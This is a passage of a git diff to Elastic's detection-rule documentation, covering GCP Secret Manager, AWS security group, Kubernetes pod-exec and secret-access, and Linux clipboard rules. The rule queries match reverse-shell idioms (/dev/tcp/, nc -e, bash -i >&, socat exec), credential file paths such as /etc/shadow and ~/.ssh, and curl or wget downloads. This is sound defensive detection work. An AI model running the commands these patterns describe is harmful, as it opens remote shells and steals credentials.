burst with `Esql.earliest_timestamp` and `Esql.latest_timestamp`, then pivot in Discover on the same + `client.user.email` / `source.ip` for related GCP audit activity. + + +*False positive analysis* + + +- Documented CSPM, secret inventory, or compliance scanners that walk many projects will match; exclude those + principals after validation. +- Break-glass or org-admin troubleshooting can look similar; require change-management correlation before raising + severity. + + +*Response and remediation* + + +- If unauthorized, revoke or rotate the implicated credentials, review IAM bindings that grant + `secretmanager.secrets.list` across projects, and inspect for subsequent secret access or exfiltration. +- Restrict Secret Manager list permissions to least privilege and prefer per-project roles over org-wide grants for + human users. + + +==== Setup + + +The GCP Fleet integration (or Filebeat module) with audit logs for Secret Manager is required. `ListSecrets` is a +data-access method; enable DATA_READ audit logging for the Secret Manager API so these events are ingested into +`logs-gcp.audit-*`. + +See https://cloud.google.com/secret-manager/docs/audit-logging[Secret Manager audit logging] and +https://cloud.google.com/logging/docs/audit/configure-data-access[Configure Data Access audit logs]. + + +==== Rule query + + +[source, js] +---------------------------------- +from logs-gcp.audit-* metadata _id, _version, _index +| where data_stream.dataset == "gcp.audit" + and event.action == "google.cloud.secretmanager.v1.SecretManagerService.ListSecrets" + and cloud.project.id is not null + and client.user.email is not null + and source.ip is not null +| stats + Esql.cloud_project_id_count_distinct = count_distinct(cloud.project.id), + Esql.cloud_project_id_values = values(cloud.project.id), + Esql.event_count = count(*), + Esql.event_outcome_values = values(event.outcome), + Esql.client_user_id_values = values(client.user.id), + Esql.user_agent_original_values = values(user_agent.original), + Esql.earliest_timestamp = min(@timestamp), + Esql.latest_timestamp = max(@timestamp) + by client.user.email, source.ip, data_stream.namespace +| where Esql.cloud_project_id_count_distinct >= 10 +| keep + client.user.email, + source.ip, + Esql.cloud_project_id_count_distinct, + Esql.cloud_project_id_values, + Esql.event_count, + Esql.event_outcome_values, + Esql.client_user_id_values, + Esql.user_agent_original_values, + Esql.earliest_timestamp, + Esql.latest_timestamp, + data_stream.namespace + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Discovery +** ID: TA0007 +** Reference URL: https://attack.mitre.org/tactics/TA0007/ +* Technique: +** Name: Cloud Service Discovery +** ID: T1526 +** Reference URL: https://attack.mitre.org/techniques/T1526/ diff --git a/docs/detections/prebuilt-rules/rule-details/insecure-aws-ec2-vpc-security-group-ingress-rule-added.asciidoc b/docs/detections/prebuilt-rules/rule-details/insecure-aws-ec2-vpc-security-group-ingress-rule-added.asciidoc index 0f2c5a4859..554fc44fe7 100644 --- a/docs/detections/prebuilt-rules/rule-details/insecure-aws-ec2-vpc-security-group-ingress-rule-added.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/insecure-aws-ec2-vpc-security-group-ingress-rule-added.asciidoc @@ -29,14 +29,14 @@ Identifies when a specified inbound (ingress) rule is added or adjusted for a VP *Tags*: * Domain: Cloud -* Data Source: AWS -* Data Source: Amazon Web Services -* Data Source: AWS EC2 -* Use Case: Threat Detection +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS EC2 * Tactic: Defense Evasion +* Rule Type: Custom Query (KQL) * Resources: Investigation Guide -*Version*: 7 +*Version*: 8 *Rule authors*: @@ -106,6 +106,7 @@ data_stream.dataset: "aws.cloudtrail" and aws.cloudtrail.flattened.request_parameters.ipPermissions.items.ipRanges.items.cidrIp: ("0.0.0.0/0" or "::/0") and aws.cloudtrail.flattened.request_parameters.ipPermissions.items.fromPort: ( 21 or 22 or 23 or 445 or 3389 or 5985 or 5986) + and not user_agent.original: (*packer-plugin-amazon* or *Terraform* or *Pulumi*) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/installation-of-custom-shim-databases.asciidoc b/docs/detections/prebuilt-rules/rule-details/installation-of-custom-shim-databases.asciidoc index 76d7285849..0849254acc 100644 --- a/docs/detections/prebuilt-rules/rule-details/installation-of-custom-shim-databases.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/installation-of-custom-shim-databases.asciidoc @@ -41,7 +41,7 @@ Identifies the installation of custom Application Compatibility Shim databases. * Data Source: Crowdstrike * Resources: Investigation Guide -*Version*: 315 +*Version*: 316 *Rule authors*: @@ -142,7 +142,9 @@ registry where host.os.type == "windows" and event.type == "change" and "\\Device\\HarddiskVolume*\\Program Files (x86)\\SAP\\SAPsetup\\setup\\NwSapSetup.exe", "\\Device\\HarddiskVolume*\\Program Files (x86)\\SAP\\SapSetup\\OnRebootSvc\\NWSAPSetupOnRebootInstSvc.exe", "\\Device\\HarddiskVolume*\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Security for Windows Server\\kavfs.exe" - ) + ) and + /* Microsoft Cloud AppCompat SDB test registrations */ + not registry.path : "*\\AppCompatFlags\\Custom\\*\\{22221111-1111-1111-1111-111111111111}.sdb" ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/kubernetes-pod-exec-cloud-instance-metadata-access.asciidoc b/docs/detections/prebuilt-rules/rule-details/kubernetes-pod-exec-cloud-instance-metadata-access.asciidoc index d96ce5f963..cdad8edbc6 100644 --- a/docs/detections/prebuilt-rules/rule-details/kubernetes-pod-exec-cloud-instance-metadata-access.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/kubernetes-pod-exec-cloud-instance-metadata-access.asciidoc @@ -25,14 +25,16 @@ Detects Kubernetes pod exec sessions whose decoded command line references cloud *Tags*: * Data Source: Kubernetes +* Data Source: Kubernetes API Server Audit Logs * Domain: Kubernetes +* Platform: Kubernetes * Domain: Cloud * Use Case: Threat Detection * Tactic: Credential Access * Tactic: Execution * Resources: Investigation Guide -*Version*: 1 +*Version*: 2 *Rule authors*: @@ -94,8 +96,8 @@ code. FROM logs-kubernetes.audit_logs-* metadata _id, _index, _version | WHERE kubernetes.audit.objectRef.subresource == "exec" AND kubernetes.audit.requestURI LIKE "*command=*" -| EVAL decoded_uri = URL_DECODE(kubernetes.audit.requestURI) -| GROK decoded_uri "%{DATA}/exec\\?%{DATA:raw_commands}&(?:container|stdin|stdout|stderr)=%{GREEDYDATA}" +| EVAL Esql.decoded_uri = URL_DECODE(kubernetes.audit.requestURI) +| GROK Esql.decoded_uri "%{DATA}/exec\\?%{DATA:raw_commands}&(?:container|stdin|stdout|stderr)=%{GREEDYDATA}" | EVAL command = REPLACE(raw_commands, "command=", "") | EVAL command = REPLACE(command, "&", " ") | EVAL Esql.executed_command = REPLACE(command, "\\+", " ") @@ -111,7 +113,7 @@ FROM logs-kubernetes.audit_logs-* metadata _id, _index, _version Esql.executed_command RLIKE """.*(security-credentials|/api/token|oauth2/token|service-accounts/.*/token).*""", "yes", "recon" ) -| KEEP * +| KEEP Esql.*, user.name, user_agent.original, event.*, source.ip, kubernetes.audit.*, _id, _version, _index, data_stream.namespace ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/kubernetes-pod-exec-potential-reverse-shell.asciidoc b/docs/detections/prebuilt-rules/rule-details/kubernetes-pod-exec-potential-reverse-shell.asciidoc index ad056ab704..c04f3a6fdb 100644 --- a/docs/detections/prebuilt-rules/rule-details/kubernetes-pod-exec-potential-reverse-shell.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/kubernetes-pod-exec-potential-reverse-shell.asciidoc @@ -25,13 +25,15 @@ Flags exec into a pod when the URL-decoded command payload resembles reverse-she *Tags*: * Data Source: Kubernetes +* Data Source: Kubernetes API Server Audit Logs * Domain: Kubernetes +* Platform: Kubernetes * Use Case: Threat Detection * Tactic: Execution * Tactic: Command and Control * Resources: Investigation Guide -*Version*: 1 +*Version*: 2 *Rule authors*: @@ -52,7 +54,7 @@ Flags exec into a pod when the URL-decoded command payload resembles reverse-she The rule inspects Kubernetes audit exec requestURI values, URL-decodes them, parses the command query fragment, and -matches high-signal shell and socket idioms often used to obtain a allback shell from inside a container. +matches high-signal shell and socket idioms often used to obtain a fallback shell from inside a container. *Possible investigation steps* @@ -92,16 +94,15 @@ matches high-signal shell and socket idioms often used to obtain a allback shell FROM logs-kubernetes.audit_logs-* metadata _id, _index, _version | WHERE kubernetes.audit.objectRef.subresource == "exec" AND kubernetes.audit.requestURI LIKE "*command=*" -| EVAL decoded_uri = URL_DECODE(kubernetes.audit.requestURI) -| GROK decoded_uri "%{DATA}/exec\\?%{DATA:raw_commands}&(?:container|stdin|stdout|stderr)=%{GREEDYDATA}" +| EVAL Esql.decoded_uri = URL_DECODE(kubernetes.audit.requestURI) +| GROK Esql.decoded_uri "%{DATA}/exec\\?%{DATA:raw_commands}&(?:container|stdin|stdout|stderr)=%{GREEDYDATA}" | EVAL command = REPLACE(raw_commands, "command=", "") | EVAL command = REPLACE(command, "&", " ") | EVAL Esql.executed_command = REPLACE(command, "\\+", " ") -| WHERE Esql.executed_command IS NOT NULL | WHERE Esql.executed_command IS NOT NULL AND command RLIKE """.*(/dev/tcp/|/dev/udp/|zsh/net/tcp|zsh/net/udp|nc\s+-e|ncat\s+-e|netcat\s+-e|nc\s.*\s-c\s|mkfifo|socat\s.*exec|socat\s.*pty|bash\s+-i\s+>&|0>&1|>&\s*/dev/tcp|import\s+socket.*connect|import\s+pty.*spawn|socket\.socket.*connect|IO::Socket::INET|fsockopen|TCPSocket\.new|/inet/tcp/).*""" AND - // local service health check patterns + // local service health check patterns NOT command RLIKE """.*/dev/tcp/(localhost|127\.0\.0\.1)/(8080|8443|9090|3000|5000|8888|80|443).*""" -| KEEP * +| KEEP Esql.*, user.name, user_agent.original, event.*, source.ip, kubernetes.audit.*, _id, _version, _index, data_stream.namespace ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/kubernetes-pod-exec-sensitive-file-or-credential-path-access.asciidoc b/docs/detections/prebuilt-rules/rule-details/kubernetes-pod-exec-sensitive-file-or-credential-path-access.asciidoc index 9a1b4e79c0..8173d0be09 100644 --- a/docs/detections/prebuilt-rules/rule-details/kubernetes-pod-exec-sensitive-file-or-credential-path-access.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/kubernetes-pod-exec-sensitive-file-or-credential-path-access.asciidoc @@ -25,13 +25,15 @@ Detects Kubernetes pod exec sessions whose decoded command line references high- *Tags*: * Data Source: Kubernetes +* Data Source: Kubernetes API Server Audit Logs * Domain: Kubernetes +* Platform: Kubernetes * Use Case: Threat Detection * Tactic: Credential Access * Tactic: Execution * Resources: Investigation Guide -*Version*: 1 +*Version*: 2 *Rule authors*: @@ -92,8 +94,8 @@ user home credential stores, and proc environ scraping. from logs-kubernetes.audit_logs-* metadata _id, _index, _version | WHERE kubernetes.audit.objectRef.subresource == "exec" AND kubernetes.audit.requestURI LIKE "*command=*" -| EVAL decoded_uri = URL_DECODE(kubernetes.audit.requestURI) -| GROK decoded_uri "%{DATA}/exec\\?%{DATA:raw_commands}&(?:container|stdin|stdout|stderr)=%{GREEDYDATA}" +| EVAL Esql.decoded_uri = URL_DECODE(kubernetes.audit.requestURI) +| GROK Esql.decoded_uri "%{DATA}/exec\\?%{DATA:raw_commands}&(?:container|stdin|stdout|stderr)=%{GREEDYDATA}" | EVAL command = REPLACE(raw_commands, "command=", "") | EVAL command = REPLACE(command, "&", " ") | EVAL Esql.executed_command = REPLACE(command, "\\+", " ") @@ -112,12 +114,12 @@ from logs-kubernetes.audit_logs-* metadata _id, _index, _version Esql.executed_command RLIKE """.*/etc/shadow.*""", "HOST_CREDENTIALS", Esql.executed_command RLIKE """.*/etc/passwd.*""", "USER_ENUMERATION", Esql.executed_command RLIKE """.*/etc/sudoers.*""", "SUDOERS_ACCESS", - Esql.executed_command RLIKE """.*(/root|/home)/\.(ssh|aws|azure|kube|config/gcloud).*""", "USER_CREDENTIALS", + Esql.executed_command RLIKE """.*(/root|/home/[^/]+)/\.(ssh|aws|azure|kube|config/gcloud).*""", "USER_CREDENTIALS", Esql.executed_command RLIKE """.*/proc/.*/environ.*""", "PROCESS_ENV_SECRETS", Esql.executed_command RLIKE """.*/etc/.*\.conf.*(password|secret|key|token|credential).*""", "EMBEDDED_CONFIG_SECRET", "OTHER_SENSITIVE" ) -| KEEP * +| KEEP Esql.*, user.name, user_agent.original, event.*, source.ip, kubernetes.audit.*, _id, _version, _index, data_stream.namespace ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/kubernetes-pod-exec-with-curl-or-wget-to-https.asciidoc b/docs/detections/prebuilt-rules/rule-details/kubernetes-pod-exec-with-curl-or-wget-to-https.asciidoc index 0f75c5ece0..a9c3d706a7 100644 --- a/docs/detections/prebuilt-rules/rule-details/kubernetes-pod-exec-with-curl-or-wget-to-https.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/kubernetes-pod-exec-with-curl-or-wget-to-https.asciidoc @@ -1,7 +1,7 @@ [[kubernetes-pod-exec-with-curl-or-wget-to-https]] === Kubernetes Pod Exec with Curl or Wget to HTTPS -Detects pod or attach exec API calls where the decoded request query implies **curl** or wget fetching an **https** URL. Attackers with permission to exec into workloads often run one-liners to stage tooling, pull scripts or binaries, or exfiltrate data over HTTPS—activity that should be rare compared to shells, debuggers, or expected health checks. The rule decodes the audit requestURI, reconstructs a readable command string from repeated command parameters, and applies **noise filters** for common cluster health and OIDC/JWKS endpoints so benign automation is less likely to alert. +Detects pod or attach exec API calls where the decoded request query implies curl or wget fetching an https URL. Attackers with permission to exec into workloads often run one-liners to stage tooling, pull scripts or binaries, or exfiltrate data over HTTPS—activity that should be rare compared to shells, debuggers, or expected health checks. The rule decodes the audit requestURI, reconstructs a readable command string from repeated command parameters, and applies noise filters for common cluster health and OIDC/JWKS endpoints so benign automation is less likely to alert. *Rule type*: esql @@ -25,13 +25,15 @@ Detects pod or attach exec API calls where the decoded request query implies **c *Tags*: * Data Source: Kubernetes +* Data Source: Kubernetes API Server Audit Logs * Domain: Kubernetes +* Platform: Kubernetes * Use Case: Threat Detection * Tactic: Execution * Tactic: Command and Control * Resources: Investigation Guide -*Version*: 1 +*Version*: 2 *Rule authors*: @@ -53,7 +55,7 @@ Detects pod or attach exec API calls where the decoded request query implies **c Kubernetes audit logs record exec (and similar attach) calls on requestURI, including URL-encoded command segments. This rule URL-decodes the URI, extracts the query portion into a single string, and -flags curl or wget combined with https, excluding several ommon health, localhost, and OIDC/JWKS patterns. +flags curl or wget combined with https, excluding several common health, localhost, and OIDC/JWKS patterns. *Possible investigation steps* @@ -61,8 +63,8 @@ flags curl or wget combined with https, excluding several ommon health, localhos - Confirm who may exec into the target namespace: review kubernetes.audit.user.username, groups, impersonation, and source.ip / user_agent.original (kubectl, CI, webhooks). -- Map the pod (kubernetes.audit.objectRef.name) and workload owner; retrieve the exact decoded URI from - Esql.decoded_uri and the reconstructed Esql.command in the alert. +- Map the pod (kubernetes.audit.objectRef.name) and workload owner; retrieve the decoded URI from + Esql.decoded_uri and the reconstructed Esql.executed_command in the alert. - Search for adjacent audit events from the same identity: secret reads, additional execs, RBAC changes, or anonymous access. - If malicious, revoke credentials used for exec, review RoleBindings for **`pods/exec`**, and inspect the pod @@ -93,15 +95,15 @@ flags curl or wget combined with https, excluding several ommon health, localhos FROM logs-kubernetes.audit_logs-* metadata _id, _index, _version | WHERE kubernetes.audit.objectRef.subresource == "exec" AND kubernetes.audit.requestURI LIKE "*command=*" -| EVAL decoded_uri = URL_DECODE(kubernetes.audit.requestURI) -| GROK decoded_uri "%{DATA}/exec\\?%{DATA:raw_commands}&(?:container|stdin|stdout|stderr)=%{GREEDYDATA}" +| EVAL Esql.decoded_uri = URL_DECODE(kubernetes.audit.requestURI) +| GROK Esql.decoded_uri "%{DATA}/exec\\?%{DATA:raw_commands}&(?:container|stdin|stdout|stderr)=%{GREEDYDATA}" | EVAL command = REPLACE(raw_commands, "command=", "") | EVAL command = REPLACE(command, "&", " ") | EVAL Esql.executed_command = REPLACE(command, "\\+", " ") | WHERE Esql.executed_command IS NOT NULL AND Esql.executed_command RLIKE """.*(curl.*https|wget.*https).*""" AND NOT Esql.executed_command RLIKE """.*(/api/v1/health|/healthz|/readyz|/livez|127\.0\.0\.1|localhost|/openid/v1/jwks|/openid-connect/certs|/.well-known/openid-configuration|/.well-known/jwks\.json|kubernetes\.default\.svc).*""" -| KEEP * +| KEEP Esql.*, user.name, user_agent.original, event.*, source.ip, kubernetes.audit.*, _id, _version, _index, data_stream.namespace ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/kubernetes-secret-get-or-list-from-node-or-pod-service-account.asciidoc b/docs/detections/prebuilt-rules/rule-details/kubernetes-secret-get-or-list-from-node-or-pod-service-account.asciidoc index 8d8ce0ee66..1a90f95195 100644 --- a/docs/detections/prebuilt-rules/rule-details/kubernetes-secret-get-or-list-from-node-or-pod-service-account.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/kubernetes-secret-get-or-list-from-node-or-pod-service-account.asciidoc @@ -1,7 +1,7 @@ [[kubernetes-secret-get-or-list-from-node-or-pod-service-account]] -=== Kubernetes Secret get or list from Node or Pod Service Account +=== Kubernetes Secret Get or List from Node or Pod Service Account -Kubernetes audit identities for kubelet (`system:node:*`) and workloads (`system:serviceaccount:*`) are meant to operate with tight, predictable API usage. Direct `get` or `list` on the Secrets API from those principals is often a sign of credential access. Attackers who stole a pod service-account token or node credentials sweep Secret objects for tokens, registry credentials, TLS keys, or application configuration. Even denied attempts still reveal intent to reach sensitive material. Legitimate controllers do read secrets they mount or manage, so this signal is most valuable when paired with triage (namespace scope, user agent, RBAC, and whether the identity should touch those secret names at all). +Kubernetes audit identities for kubelet (system:node:*) and workloads (system:serviceaccount:*) are meant to operate with tight, predictable API usage. Direct get or list on the Secrets API from those principals is often a sign of credential access. Attackers who stole a pod service-account token or node credentials sweep Secret objects for tokens, registry credentials, TLS keys, or application configuration. Even denied attempts still reveal intent to reach sensitive material. Legitimate controllers do read secrets they mount or manage, so this signal is most valuable when paired with triage (namespace scope, user agent, RBAC, and whether the identity should touch those secret names at all). *Rule type*: query @@ -27,12 +27,14 @@ Kubernetes audit identities for kubelet (`system:node:*`) and workloads (`system *Tags*: * Data Source: Kubernetes +* Data Source: Kubernetes API Server Audit Logs * Domain: Kubernetes +* Platform: Kubernetes * Use Case: Threat Detection * Tactic: Credential Access * Resources: Investigation Guide -*Version*: 3 +*Version*: 4 *Rule authors*: @@ -49,7 +51,7 @@ Kubernetes audit identities for kubelet (`system:node:*`) and workloads (`system -*Investigating Kubernetes Secret get or list from Node or Pod Service Account* +*Investigating Kubernetes Secret Get or List from Node or Pod Service Account* This rule fires on Kubernetes audit events where the authenticated user is a node (`system:node:`) or a diff --git a/docs/detections/prebuilt-rules/rule-details/kubernetes-secret-get-or-list-with-suspicious-user-agent.asciidoc b/docs/detections/prebuilt-rules/rule-details/kubernetes-secret-get-or-list-with-suspicious-user-agent.asciidoc index 2868076e80..2b1359b489 100644 --- a/docs/detections/prebuilt-rules/rule-details/kubernetes-secret-get-or-list-with-suspicious-user-agent.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/kubernetes-secret-get-or-list-with-suspicious-user-agent.asciidoc @@ -1,7 +1,7 @@ [[kubernetes-secret-get-or-list-with-suspicious-user-agent]] -=== Kubernetes Secret get or list with Suspicious User Agent +=== Kubernetes Secret Get or List with Suspicious User Agent -Detects read access to Kubernetes Secrets (`get`/`list`) with a user agent matching a curated set of non-standard or attacker-leaning clients, for example minimal HTTP tooling, common scripting stacks, default library fingerprints, or distribution-tagged strings associated with offensive-security Linux images. Legitimate in-cluster automation usually presents stable, purpose-specific user agents (for example controller or client-go variants used by known components). +Detects read access to Kubernetes Secrets (get/list) with a user agent matching a curated set of non-standard or attacker-leaning clients, for example minimal HTTP tooling, common scripting stacks, default library fingerprints, or distribution-tagged strings associated with offensive-security Linux images. Legitimate in-cluster automation usually presents stable, purpose-specific user agents (for example controller or client-go variants used by known components). *Rule type*: query @@ -27,12 +27,14 @@ Detects read access to Kubernetes Secrets (`get`/`list`) with a user agent match *Tags*: * Data Source: Kubernetes +* Data Source: Kubernetes API Server Audit Logs * Domain: Kubernetes +* Platform: Kubernetes * Use Case: Threat Detection * Tactic: Credential Access * Resources: Investigation Guide -*Version*: 1 +*Version*: 2 *Rule authors*: @@ -49,7 +51,7 @@ Detects read access to Kubernetes Secrets (`get`/`list`) with a user agent match -*Investigating Kubernetes Secret get or list with Suspicious User Agent* +*Investigating Kubernetes Secret Get or List with Suspicious User Agent* The rule matches Kubernetes audit events for **secret** `get`/`list` where **`user_agent.original`** matches a **small @@ -93,7 +95,8 @@ like routine kubectl or well-known controller traffic relative to your environme data_stream.dataset:"kubernetes.audit_logs" and event.action:(get or list) and kubernetes.audit.objectRef.resource:"secrets" and -user_agent.original:(curl* or python* or Python* or wget* or Go-http* or perl* or java* or node* or php* or *distrib#kali* or *kali-amd64 or *kali-arm64*) and +event.outcome:"success" and +user_agent.original:(curl* or python* or Python* or wget* or Go-http* or perl* or java* or node* or php* or *distrib#kali* or *kali-amd64* or *kali-arm64* or Bun* or axios* or undici*) and source.ip:* ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/kubernetes-secret-or-configmap-access-via-azure-arc-proxy.asciidoc b/docs/detections/prebuilt-rules/rule-details/kubernetes-secret-or-configmap-access-via-azure-arc-proxy.asciidoc index 9d23710daf..02ea36b370 100644 --- a/docs/detections/prebuilt-rules/rule-details/kubernetes-secret-or-configmap-access-via-azure-arc-proxy.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/kubernetes-secret-or-configmap-access-via-azure-arc-proxy.asciidoc @@ -1,7 +1,7 @@ [[kubernetes-secret-or-configmap-access-via-azure-arc-proxy]] === Kubernetes Secret or ConfigMap Access via Azure Arc Proxy -Detects when secrets or configmaps are accessed, created, modified, or deleted in a Kubernetes cluster by the Azure Arc AAD proxy service account. When operations are routed through the Azure Arc Cluster Connect proxy, the Kubernetes audit log records the acting user as `system:serviceaccount:azure-arc:azure-arc-kube-aad-proxy-sa` with the actual caller identity in the `impersonatedUser` field. This pattern indicates that someone is accessing the cluster through the Azure ARM API rather than directly via kubectl against the API server. While legitimate for Arc-managed workflows, adversaries with stolen service principal credentials can abuse Arc Cluster Connect to read, exfiltrate, or modify secrets and configmaps while appearing as the Arc proxy service account in K8s audit logs. +Detects when secrets or configmaps are accessed, created, modified, or deleted in a Kubernetes cluster by the Azure Arc AAD proxy service account. When operations are routed through the Azure Arc Cluster Connect proxy, the Kubernetes audit log records the acting user as system:serviceaccount:azure-arc:azure-arc-kube-aad-proxy-sa with the actual caller identity in the impersonatedUser field. This pattern indicates that someone is accessing the cluster through the Azure ARM API rather than directly via kubectl against the API server. While legitimate for Arc-managed workflows, adversaries with stolen service principal credentials can abuse Arc Cluster Connect to read, exfiltrate, or modify secrets and configmaps while appearing as the Arc proxy service account in K8s audit logs. This rule uses a 5-day new-terms history window keyed on the impersonated identity and alerts the first time that Azure AD principal performs this activity. *Rule type*: esql @@ -28,14 +28,16 @@ Detects when secrets or configmaps are accessed, created, modified, or deleted i *Tags*: * Data Source: Kubernetes +* Data Source: Kubernetes API Server Audit Logs * Domain: Kubernetes +* Platform: Kubernetes * Domain: Cloud * Use Case: Threat Detection * Tactic: Credential Access * Tactic: Collection * Resources: Investigation Guide -*Version*: 2 +*Version*: 3 *Rule authors*: @@ -61,6 +63,9 @@ rule detects non-system secret and configmap access — including reads, writes, proxy path. Read operations (`get`, `list`) are particularly important to detect as they represent the most common adversary action: exfiltrating secrets without leaving obvious modification traces. +This rule uses a new terms approach keyed on `kubernetes.audit.impersonatedUser.username`, so it fires the first time a +given impersonated identity performs this activity within the 5-day history window. + *Possible investigation steps* @@ -103,6 +108,7 @@ FROM logs-kubernetes.audit_logs-* metadata _id, _version, _index Esql.resource_type_values = VALUES(kubernetes.audit.objectRef.resource), Esql.resource_name_values = VALUES(kubernetes.audit.objectRef.name), Esql.namespace_values = VALUES(kubernetes.audit.objectRef.namespace), + Esql.data_stream_namespace_values = VALUES(data_stream.namespace), Esql.acting_user_values = VALUES(kubernetes.audit.user.username), Esql.user_agent_values = VALUES(kubernetes.audit.userAgent), Esql.source_ips_values = VALUES(kubernetes.audit.sourceIPs), @@ -113,7 +119,7 @@ FROM logs-kubernetes.audit_logs-* metadata _id, _version, _index BY kubernetes.audit.impersonatedUser.username | WHERE Esql.timestamp_first_seen >= NOW() - 9 minutes -| KEEP * +| KEEP kubernetes.audit.impersonatedUser.username, Esql.* ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/kubernetes-secrets-list-across-cluster-or-sensitive-namespaces.asciidoc b/docs/detections/prebuilt-rules/rule-details/kubernetes-secrets-list-across-cluster-or-sensitive-namespaces.asciidoc index 3251109e28..406f2731c6 100644 --- a/docs/detections/prebuilt-rules/rule-details/kubernetes-secrets-list-across-cluster-or-sensitive-namespaces.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/kubernetes-secrets-list-across-cluster-or-sensitive-namespaces.asciidoc @@ -32,7 +32,7 @@ Detects list operations on Kubernetes Secrets from a non-loopback client when th * Tactic: Discovery * Resources: Investigation Guide -*Version*: 2 +*Version*: 3 *Rule authors*: @@ -80,8 +80,8 @@ event.dataset:"kubernetes.audit_logs" and event.action:list and kubernetes.audit.objectRef.resource:secrets and kubernetes.audit.requestURI :(/api/v1/secrets or /api/v1/secrets?limit* or /api/v1/namespaces/kube-system/secrets or /api/v1/namespaces/kube-system/secrets?limit* or /api/v1/namespaces/default/secrets or /api/v1/namespaces/default/secrets?limit*) and source.ip:(* and not ("::1" or "127.0.0.1")) and -not user.name: (system\:kube-controller-manager or eks\:cloud-controller-manager or eks\:kms-storage-migrator) and -not kubernetes.audit.user.groups:"system:serviceaccounts:ibm-csi" +not user.name: (system\:kube-controller-manager or eks\:cloud-controller-manager or eks\:kms-storage-migrator or "system:serviceaccount:argocd:argocd-application-controller" or "system:serviceaccount:elastic:kube-state-metrics" or "system:serviceaccount:cert-manager:cert-manager-cainjector" or "system:serviceaccount:elastic-system:elastic-agent" or "system:serviceaccount:longhorn-system:longhorn-service-account") and +not kubernetes.audit.user.groups:("system:serviceaccounts:ibm-csi" or "system:serviceaccounts:argocd" or "system:serviceaccounts:elastic") ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/linux-clipboard-activity-detected.asciidoc b/docs/detections/prebuilt-rules/rule-details/linux-clipboard-activity-detected.asciidoc index cae7b63872..3ec0a4f64a 100644 --- a/docs/detections/prebuilt-rules/rule-details/linux-clipboard-activity-detected.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/linux-clipboard-activity-detected.asciidoc @@ -23,7 +23,9 @@ This rule monitors for the usage of the most common clipboard utilities on unix *Maximum alerts per execution*: 100 -*References*: None +*References*: + +* https://www.trellix.com/blogs/research/when-agents-go-rogue-openclaw-supply-chain-crisis/ *Tags*: @@ -37,7 +39,7 @@ This rule monitors for the usage of the most common clipboard utilities on unix * Data Source: SentinelOne * Resources: Investigation Guide -*Version*: 10 +*Version*: 11 *Rule authors*: @@ -102,7 +104,7 @@ Clipboard utilities on Linux, such as xclip and xsel, facilitate data transfer b ---------------------------------- event.category:process and host.os.type:"linux" and event.type:"start" and event.action:("exec" or "exec_event" or "executed" or "process_started" or "start") and -process.name:("xclip" or "xsel" or "wl-clipboard" or "clipman" or "copyq") and +process.name:("xclip" or "xsel" or "wl-clipboard" or "clipman" or "copyq" or "pbcopy" or "wl-copy") and not process.parent.name:("bwrap" or "micro") ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/newly-observed-ipsec-nat-traversal-peer.asciidoc b/docs/detections/prebuilt-rules/rule-details/newly-observed-ipsec-nat-traversal-peer.asciidoc new file mode 100644 index 0000000000..48907d7b62 --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/newly-observed-ipsec-nat-traversal-peer.asciidoc @@ -0,0 +1,156 @@ +[[newly-observed-ipsec-nat-traversal-peer]] +=== Newly Observed IPSEC NAT Traversal Peer + +This rule identifies outbound IPSEC NAT Traversal (NAT-T) traffic to an external destination IP that was not observed during the previous 5 days. IPSEC is a VPN technology that allows one system to talk to another using encrypted tunnels. NAT Traversal encapsulates IPSEC ESP traffic in UDP and, once a NAT device is detected, both peers float to UDP port 4500 for the tunnel data channel. Newly observed external NAT-T peers may indicate unauthorized VPN use or an adversary tunneling command and control or exfiltration traffic over the Internet. + +*Rule type*: esql + +*Rule indices*: None + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-7205m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Tactic: Command and Control +* Domain: Endpoint +* Use Case: Threat Detection +* Data Source: PAN-OS +* Data Source: Network Traffic +* Data Source: pfSense +* Data Source: Zeek +* Resources: Investigation Guide + +*Version*: 113 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Newly Observed IPSEC NAT Traversal Peer* + + +IPSEC NAT Traversal facilitates secure VPN communication across NAT devices by encapsulating IPSEC packets in UDP, typically using port 4500. While essential for legitimate encrypted traffic, adversaries exploit this to mask malicious activities and bypass network defenses. This rule surfaces an external destination the first time NAT-T traffic to it is observed within a 5-day history window. + + +*Possible investigation steps* + + +- Review the source and destination IP addresses associated with the UDP traffic on port 4500 to determine if they are known or expected within your network environment. +- Analyze the volume and frequency of the detected traffic to assess whether it aligns with typical IPSEC NAT Traversal usage or if it appears anomalous. +- Check for any associated network traffic events in the same timeframe that might indicate a pattern of suspicious activity, such as unusual data transfer volumes or connections to known malicious IP addresses. +- Investigate the endpoint or device generating the traffic to verify if it is authorized to use IPSEC NAT Traversal and if it has any history of security 